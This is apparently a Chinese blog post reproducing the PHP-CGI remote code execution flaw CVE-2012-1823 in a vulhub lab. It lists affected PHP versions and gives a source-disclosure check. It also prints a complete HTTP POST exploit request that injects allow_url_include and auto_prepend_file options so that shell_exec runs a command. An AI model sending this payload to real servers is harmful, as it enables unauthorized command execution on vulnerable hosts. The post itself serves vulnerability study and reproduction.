PHP-CGI远程代码执行漏洞(CVE-2012-1823&&CVE-2012-2311)

本文详细介绍了一起影响PHP版本低于5.3.12和5.4.2的CVE-2012-1823漏洞,展示了复现方法和利用payload,并探讨了修复措施和安全建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞详细

详细务必请看:https://vulhub.org/#/environments/php/CVE-2012-1823/

影响版本

php < 5.3.12 or php < 5.4.2

漏洞复现

访问http://your-ip:8080/index.php?-s即爆出源码,说明漏洞存在,我们可以发送以下数据包来执行任意命令:

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: your_ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

<?php echo shell_exec("id"); ?>

在这里插入图片描述

CVE-2012-2311

在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值